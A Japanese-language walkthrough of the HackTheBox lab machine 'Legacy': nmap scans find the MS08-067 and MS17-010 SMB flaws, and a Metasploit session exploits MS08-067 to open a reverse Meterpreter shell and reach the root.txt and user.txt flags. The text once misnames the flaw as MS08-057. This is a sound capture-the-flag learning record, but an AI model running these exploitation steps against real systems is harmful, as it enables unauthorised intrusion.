HackTheBox WriteUp:Legacy
HackTheBox攻略対象2つ目
自身にとっては初めてのWindowsマシンでした
1.調査
nmapを用いて調査
今回は通常の調査に加え、ポート狙い撃ちで確認しました
kali@kali:~/SyachinekoLab/workspace/HTB/Legacy$ sudo nmap -sS -sV -A -p 1-20000 -T5 10.10.10.4 [sudo] kali のパスワード: Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-17 08:04 EDT Nmap scan report for 10.10.10.4 Host is up (0.16s latency). Not shown: 19997 filtered ports PORT STATE SERVICE VERSION 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows XP microsoft-ds 3389/tcp closed ms-wbt-server Device type: general purpose|specialized Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (92%), General Dynamics embedded (88%) OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2 Aggressive OS guesses: Microsoft Windows XP SP2 or Windows Small Business Server 2003 (92%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (92%), Microsoft Windows XP SP2 (92%), Microsoft Windows Server 2003 (90%), Microsoft Windows XP SP3 (90%), Microsoft Windows 2000 SP4 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP SP2 or SP3 (90%), Microsoft Windows XP Professional SP2 (90%), Microsoft Windows XP SP2 or Windows Server 2003 (89%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp Host script results: |_clock-skew: mean: -4h29m03s, deviation: 2h07m16s, median: -5h59m03s |_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:52:0b (VMware) | smb-os-discovery: | OS: Windows XP (Windows 2000 LAN Manager) | OS CPE: cpe:/o:microsoft:windows_xp::- | Computer name: legacy | NetBIOS computer name: LEGACY\x00 | Workgroup: HTB\x00 |_ System time: 2020-06-17T12:08:26+03:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2) TRACEROUTE (using port 3389/tcp) HOP RTT ADDRESS 1 155.75 ms 10.10.14.1 2 156.03 ms 10.10.10.4 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 241.17 seconds 445ポートに対して狙い撃ち kali@kali:~/SyachinekoLab/workspace/HTB/Legacy$ cat nmap_445.txt Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-19 19:24 EDT Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | 224.0.0.251 | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable). Nmap scan report for 10.10.10.4 Host is up (0.17s latency). PORT STATE SERVICE 445/tcp open microsoft-ds |_clamav-exec: ERROR: Script execution failed (use -d to debug) Host script results: |_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED | smb-vuln-ms08-067: | VULNERABLE: | Microsoft Windows system vulnerable to remote code execution (MS08-067) | State: VULNERABLE | IDs: CVE:CVE-2008-4250 | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, | Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary | code via a crafted RPC request that triggers the overflow during path canonicalization. | | Disclosure date: 2008-10-23 | References: | https://technet.microsoft.com/en-us/library/security/ms08-067.aspx |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250 |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug) | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ Nmap done: 1 IP address (1 host up) scanned in 51.73 seconds
脆弱性であるMS08-057を見つけたので、Metasploitによる侵入を試みた
2.侵入
Metasploitで下記スクリプトを用いて侵入を試みた
kali@kali:~/SyachinekoLab/workspace/HTB/Legacy$ msfconsole [!] The following modules were loaded with warnings: [!] /usr/share/metasploit-framework/modules/exploits/19671.rb [!] Please see /home/kali/.msf4/logs/framework.log for details. Metasploit Park, System Security Interface Version 4.0.5, Alpha E Ready... > access security access: PERMISSION DENIED. > access security grid access: PERMISSION DENIED. > access main security grid access: PERMISSION DENIED....and... YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! =[ metasploit v5.0.85-dev ] + -- --=[ 2003 exploits - 1093 auxiliary - 342 post ] + -- --=[ 560 payloads - 45 encoders - 10 nops ] + -- --=[ 7 evasion ] Metasploit tip: Writing a custom module? After editing your module, why not try the reload command msf5 > search MS08-067 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption msf5 > use 0 msf5 exploit(windows/smb/ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 445 yes The SMB service port (TCP) SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Exploit target: Id Name -- ---- 0 Automatic Targeting msf5 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.10.10.4 RHOSTS => 10.10.10.4 msf5 exploit(windows/smb/ms08_067_netapi) > check [+] 10.10.10.4:445 - The target is vulnerable. msf5 exploit(windows/smb/ms08_067_netapi) > run [*] Started reverse TCP handler on 10.10.14.20:4444 [*] 10.10.10.4:445 - Automatically detecting the target... [*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English [*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX) [*] 10.10.10.4:445 - Attempting to trigger the vulnerability... [*] Sending stage (180291 bytes) to 10.10.10.4 [*] Meterpreter session 1 opened (10.10.14.20:4444 -> 10.10.10.4:1029) at 2020-06-19 19:31:14 -0400 meterpreter >
攻撃が成功し、侵入することができた
3.探索
侵入した先のディレクトリに、さっそくroot.txtがありました
ほかのディレクトリも探索し、遅れてuser.txtを発見、これにて攻略終了です
meterpreter > ls Listing: C:\Documents and Settings\Administrator\Desktop ======================================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 32 fil 2017-03-16 02:18:19 -0400 root.txt meterpreter > pwd C:\Documents and Settings\Administrator\Desktop meterpreter > cd Usage: cd directory meterpreter > ls Listing: C:\Documents and Settings\Administrator\Desktop ======================================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 32 fil 2017-03-16 02:18:19 -0400 root.txt meterpreter > cd .. meterpreter > ls Listing: C:\Documents and Settings\Administrator ================================================ Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40555/r-xr-xr-x 0 dir 2017-03-16 02:07:20 -0400 Application Data 40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 Cookies 40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 Desktop 40555/r-xr-xr-x 0 dir 2017-03-16 02:07:20 -0400 Favorites 40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 Local Settings 40555/r-xr-xr-x 0 dir 2017-03-16 02:07:20 -0400 My Documents 100666/rw-rw-rw- 524288 fil 2017-03-16 02:07:20 -0400 NTUSER.DAT 100666/rw-rw-rw- 1024 fil 2017-03-16 02:07:20 -0400 NTUSER.DAT.LOG 40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 NetHood 40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 PrintHood 40555/r-xr-xr-x 0 dir 2017-03-16 02:07:20 -0400 Recent 40555/r-xr-xr-x 0 dir 2017-03-16 02:07:20 -0400 SendTo 40555/r-xr-xr-x 0 dir 2017-03-16 02:07:20 -0400 Start Menu 40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 Templates 100666/rw-rw-rw- 178 fil 2017-03-16 02:07:21 -0400 ntuser.ini meterpreter > cd .. meterpreter > ls Listing: C:\Documents and Settings ================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 Administrator 40777/rwxrwxrwx 0 dir 2017-03-16 01:20:29 -0400 All Users 40777/rwxrwxrwx 0 dir 2017-03-16 01:20:29 -0400 Default User 40777/rwxrwxrwx 0 dir 2017-03-16 01:32:52 -0400 LocalService 40777/rwxrwxrwx 0 dir 2017-03-16 01:32:42 -0400 NetworkService 40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 john meterpreter > cd john meterpreter > ls Listing: C:\Documents and Settings\john ======================================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 Application Data 40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 Cookies 40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 Desktop 40555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 Favorites 40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 Local Settings 40555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 My Documents 100666/rw-rw-rw- 524288 fil 2017-03-16 01:33:41 -0400 NTUSER.DAT 100666/rw-rw-rw- 1024 fil 2017-03-16 01:33:41 -0400 NTUSER.DAT.LOG 40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 NetHood 40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 PrintHood 40555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 Recent 40555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 SendTo 40555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 Start Menu 40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 Templates 100666/rw-rw-rw- 178 fil 2017-03-16 01:33:42 -0400 ntuser.ini meterpreter > cd Desktop meterpreter > ls Listing: C:\Documents and Settings\john\Desktop =============================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 32 fil 2017-03-16 02:19:32 -0400 user.txt meterpreter >
以上